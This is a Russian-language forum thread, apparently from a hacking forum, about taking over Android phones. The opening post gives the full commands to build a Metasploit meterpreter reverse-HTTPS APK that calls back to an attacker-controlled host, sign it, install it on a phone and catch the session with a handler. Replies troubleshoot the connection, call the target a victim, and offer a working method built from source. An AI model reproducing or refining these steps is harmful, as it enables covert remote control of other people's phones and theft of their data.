Взлом android: msfvenom -p android/...

27.09.2016
13
9
#1
Основу взял тут.
Предварительно пробросил 443 порт на роутере.
Создал АРК
Код:
msfvenom -p android/meterpreter/reverse_https LHOST=****.hldns.ru LPORT=443 R > example.apk
Затем создал подпись
Код:
keytool -genkey -v -keystore release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Подписал APK
Код:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /keys/release-key.keystore example.apk alias_name
Кинул АРК на телефон (пробовал на android 5.1 и android 4.2 результат одинаков). Все запустилось.

В терминале как обычно
Код:
msfconsole
...
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.3
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
эксплоит стартует, но постояно пишет
Код:
Sending stage (957999 bytes) to 192.168.1.2
Sending stage (957999 bytes) to 192.168.1.2
Sending stage (957999 bytes) to 192.168.1.2
...
Sending stage (957999 bytes) to 192.168.1.2
Соединение так и не произошло!!

Аналогичные действия провожу в Armitage 1.4.11
И, мазаль тов!!!
Код:
meterpreter>
Но через пары команд жертва перестает реагировать.

В общем хочется разобраться в двух вопросах:
1. Почему в терминале не открылась сессия?
2. Почему через 10-15 мин. отваливается конект в Эрмитаже?
 
Последнее редактирование:

Aldo

New member
16.08.2016
3
2
#4
Ребят, кто знает, как узнать порт на вируальной машине?
прописывал ifconfig узнавал свой хост и вводил порт 4444 и при запуске апк ничего не происходило в чем проблема?
 

z3RoTooL

Премиум
28.02.2016
626
484
#5
Ребят, кто знает, как узнать порт на вируальной машине?
прописывал ifconfig узнавал свой хост и вводил порт 4444 и при запуске апк ничего не происходило в чем проблема?
может потому что виртуалку надо ставить в общую сеть, а не через NAT ?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Gold Team
19.10.2016
735
2 643
#7
Сначала все нужно тестить на себе или эмуляторе,что бы наглядно видеть что происходить на стороне жертвы.Причин может быть много.Одна из - DroidWall ( или какой то фаерволл для андроида,обычно его ставят для блокировки рекламы на рутированых устройствах,хотя если речь идёт о рядомом юзере то эта версия отпадает)
Могу по желанию написать статью с рабочим методом через сборку из исходников.
 

MAdDog719

Well-known member
16.08.2016
108
26
#8
Напиши, пожалуйста, будет очень интересно посмотреть /попробовать.
 

OtherMan

New member
09.11.2016
1
0
#9
под рукой был samsung galaxy s6 edge все делал по выше указанной инструкции такая же проблема (((
на LG полет нормальный )))